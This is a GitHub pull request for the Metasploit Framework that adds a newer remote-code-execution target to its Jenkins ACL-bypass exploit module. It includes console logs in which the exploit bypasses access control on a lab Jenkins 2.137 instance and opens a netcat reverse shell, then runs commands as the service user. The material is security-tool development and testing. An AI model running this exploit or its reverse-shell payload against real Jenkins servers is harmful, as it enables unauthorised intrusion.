Add newer RCE vector to Jenkins ACL bypass exploit #11864

Merged
merged 5 commits into from
May 23, 2019

Conversation

wvu
Contributor

@wvu wvu commented May 21, 2019

msf5 exploit(multi/http/jenkins_metaprogramming) > options

Module options (exploit/multi/http/jenkins_metaprogramming):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.28.128.3     yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins         yes       Base path to Jenkins
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:45020) at 2019-05-21 15:13:26 -0500

id
uid=112(tomcat8) gid=117(tomcat8) groups=117(tomcat8)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

#11466

@wvu wvu force-pushed the feature/jenkins branch 2 times, most recently from d60790f to ebe2bc6 on May 22, 2019 16:50
@jrobles-r7 jrobles-r7 self-assigned this May 22, 2019
@jrobles-r7
Contributor

@wvu-r7 LGTM. I did run into the Mdm::Workspace issue that you mentioned previously when using the Java Dropper but that is a separate issue from these changes.

msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started reverse TCP handler on 172.22.222.136:8443 
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.22.222.136:8443 -> 172.22.222.112:41071) at 2019-05-23 06:24:17 -0500

uname -a
Linux 8ac8c4e5a351 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 GNU/Linux
whoami
jenkins

@jrobles-r7 jrobles-r7 merged commit 801af31 into rapid7:master May 23, 2019
@jrobles-r7
Contributor

jrobles-r7 commented May 23, 2019

Release Notes

This updates the jenkins_metaprogramming exploit module with an additional target that uses the GroovyShell.parse entry point for command execution.

@wvu
Contributor Author

wvu commented May 23, 2019

Awesome, thanks!

@wvu wvu deleted the feature/jenkins branch May 23, 2019 15:30
@wvu
Contributor Author

wvu commented May 23, 2019

Failure to stage Java Meterpreter fixed in #11871.
